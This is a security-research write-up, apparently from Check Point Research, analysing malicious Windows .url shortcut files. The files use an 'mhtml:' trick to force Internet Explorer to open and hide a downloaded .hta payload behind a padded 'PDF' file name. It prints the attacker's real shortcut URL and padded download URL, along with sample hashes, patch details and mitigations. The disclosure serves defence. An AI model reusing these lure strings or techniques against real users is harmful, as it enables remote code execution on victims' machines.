from Haifei Li
Introduction and background
Check Point Research recently discovered that threat actors have been using new (or previously unknown) tricks to lure Windows users into executing remote code. Specifically, the attackers used special Windows Internet Shortcut files (.url extension name), which, when clicked, would invoke the outdated Internet Explorer (IE) to visit the attacker-controlled URL. An additional trick in IE is used to hide the malicious .hta extension name. By opening the URL with IE instead of the modern and much more secure Chrome/Edge browser on Windows, the attacker gained significant advantages in exploiting the victim’s computer, even though the computer was running the modern Windows 10/11 operating system .
Despite some technical backgrounds, it is not uncommon for cybercriminals to use .url files as an initial attack vector in their campaigns. Even the use of new or zero-day URL file-related vulnerabilities has happened before: CVE-2023-36025, which was only patched last November, is a good example.
The malicious .url samples we discovered may have dated as far back as January 2023 (over a year ago) to May 13, 2024 (a few days ago, at the time of writing). This suggests that threat actors have been using the attack techniques for some time.
Bring Internet Explorer back to life via the “mhtml” trick
Let’s use the latest .url example on Virus Total as an example to explain the technique.
The contents of the sample:
As we can see, the last lines of strings of the .url file point to a custom icon in the Microsoft Edge application file msedge.exe. This makes it look like it points to a PDF file (but it actually doesn’t).
Importantly, as we can see, the value of the URL keyword is very different from usual – usually for regular .url files the URL parameter would look like URL=https://www.google.com that points to the URL https://www.google.com. But in this example the value is:
mhtml:http://cbmelipilla.cl/te/test1.html!x-usc:http://cbmelipilla.cl/te/test1.html
A special prefix is used mhtml: and also a !x-usc: in the middle.
A few years ago we saw the same trick (which we call the “mhtml” trick) used in the infamous CVE-2021-40444 zero-day attacks, where the file document.xml.rels contains exactly the same string.
We know that the “mhtml” trick was previously used in Word documents when exploiting the CVE-2021-40444 vulnerability, and now we see the same trick being used in the .url file. What can the attackers achieve by using this? Let’s do some tests.
If we rename the example to Books_A0UJKO.pdf.url (the name in the wild), the .url file will look like this on the (fully patched) Windows 11 – appearing as a link to a PDF file.
If we act like a victim (we want to open the PDF), we double-click on the shortcut file. Then the victim gets this:
See what’s strange there? The Internet Explorer opens. With some debugging skills we were even able to confirm that IE was indeed used to open the link http://cbmelipilla[.]cl/te/test1.htmlthat is specified in the .url file.
As we know, Microsoft declared IE retired a few years ago. On typical Windows 10/11, normal user actions should not be able to open IE to visit websites as they do not enjoy the same level of security as modern browsers. IE is an outdated web browser and was known for its insecurity – and this is one of the main reasons why Microsoft replaced it with the modern and more secure Microsoft Edge, or users simply installed and used Google’s Chrome browser.
Disclaimer: Even though IE has been declared ‘retired and no longer supported’, technically IE is still part of the Windows operating system and is ‘not inherently unsafe, as IE is still maintained for security vulnerabilities and has no known exploitable security issues,” according to our communication with Microsoft.
So by default, users are not allowed to open websites using IE unless the user specifically requests it and with the user’s full knowledge.
However, in this example, with the ‘mhtml’ trick, when the victim opens the .url shortcut (the victim thinks he/she is opening a PDF), the attacker-controlled website opens with IE, instead of the typical Chrome /Edge.
From there (the website is opened with IE) the attacker can do a lot of bad things because IE is insecure and outdated. For example, if the attacker has a zero-day exploit in IE, which is much easier to find compared to Chrome/Edge, the attacker can attack the victim to immediately execute the remote code. However, in the samples we analyzed, threat actors did not use IP remote code exploitation. Instead, they used another trick in IE – which was probably not previously publicly known – as far as we know – to trick the victim into executing code remotely.
Additional IE trick – Hide the .hta extension name
Let’s take another look at the previous figure (highlighted below). According to the promoted (IE) dialog box, it appears to ask the user to open a PDF file named Books_A0UJKO.pdf.
However, is this the real case here? Think you’re opening a PDF?
Not really. If we click “Open” (the default option) in the IE dialog box above, we are presented with another promoted dialog box (see below). This is due to IE’s protected mode (a relatively weaker browser sandbox).
If the victim continues to ignore the warning (because the victim thinks he/she is opening a PDF), the victim’s machine will eventually be hacked. The “opened” file is actually a malicious .hta file that is downloaded and executed.
If we look closely at the HTTP traffic, we will see that there are many non-printable characters at the end of the text. Books_A0UJKO.pdf string. Finally, there is the string .hta: this is the real (and dangerous) extension name.
This is exactly why the IE dialog was not showing the .hta file name to the user. The real full URL is:
https://cbmelipilla.cl/te/Books_A0UJKO.pdf%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80.hta
With this trick, the attacker could be more successful in tricking the victim into continuing with the actions, while in fact the victim downloads and runs a dangerous .hta application.
bd710ee53ef3ad872f3f0678117050608a8e073c87045a06a86fb4a7f0e4eff0 b16aee58b7dfaf2a612144e2c993e29dcbd59d8c20e0fd0ab75b76dd9170e104 65142c8f490839a60f4907ab8f28dd9db4258e1cfab2d48e89437ef2188a6e94 bfd59ed369057c325e517b22be505f42d60916a47e8bdcbe690210a3087d466d 22e2d84c2a9525e8c6a825fb53f2f30621c5e6c68b1051432b1c5c625ae46f8c c9f58d96ec809a75679ec3c7a61eaaf3adbbeb6613d667257517bdc41ecca9ae
Defense and mitigation
We have confirmed that the exploit tricks discussed – which have been actively used in the wild for at least a year – work on the latest Windows 10/11 operating systems.
Check Point released the following protections for IPS and Harmony Email months before this publication, with the IPS signature called “Internet Shortcut File Remote Code Execution” for our customers to protect against this zero-day attack.
Harmony email and collaboration provides comprehensive inline protection against this zero-day attack at the highest security level.
We reported our findings to the Microsoft Security Response Center (MSRC) on Thursday, May 16, 2024. Since then, both parties have worked closely on this issue, resulting in an official Microsoft patch (CVE-2024-38112) released on July 9. Windows users are strongly advised to apply the patch as soon as possible.
For concerned Windows users, we recommend being especially vigilant about .url files sent from untrusted sources. As we discussed, this type of attack requires a number of warnings (user interactions) to succeed.
Check Point Research continues to monitor activity related to these types of attacks around the world.
[Update on July 16]
We have learned from Microsoft that our investigation has actually resulted in two patches – not just the CVE-2024-38112 as previously reported. Microsoft has released a ‘Defense in Depth’ patch for our findings. Please see the following official acknowledgment that MSRC shared with us (can also be found with some keywords at https://msrc.microsoft.com/update-guide/acknowledgement).
As we discussed, two zero-day tricks have been found in these attacks. So we guess that the CVE-2024-38112 is intended to patch the “hiding the .hta extension name” trick in IE, while this “Defense in depth” patch (no CVE ID) is intended to unregistering the “mhtml” handle in .url files. Our analysis showed that after installing the July patches, the following dialog box appears when the victim clicks on the malicious .url file, which stops IE from opening malicious .url files via the “mhtml” trick.
[End of Update]
Conclusion
To summarize the attacks from an exploitation perspective, the first technique used in these campaigns is the ‘mhtml’ trick, which allows the attacker to call IE instead of the more secure Chrome/Edge. The second technique is an IE trick to trick the victim into believing he is opening a PDF file, while in reality he is downloading and running a dangerous file. .hta application. The overall goal of these attacks is to trick victims into believing that they are opening a PDF file, and this is made possible by using these two tricks.
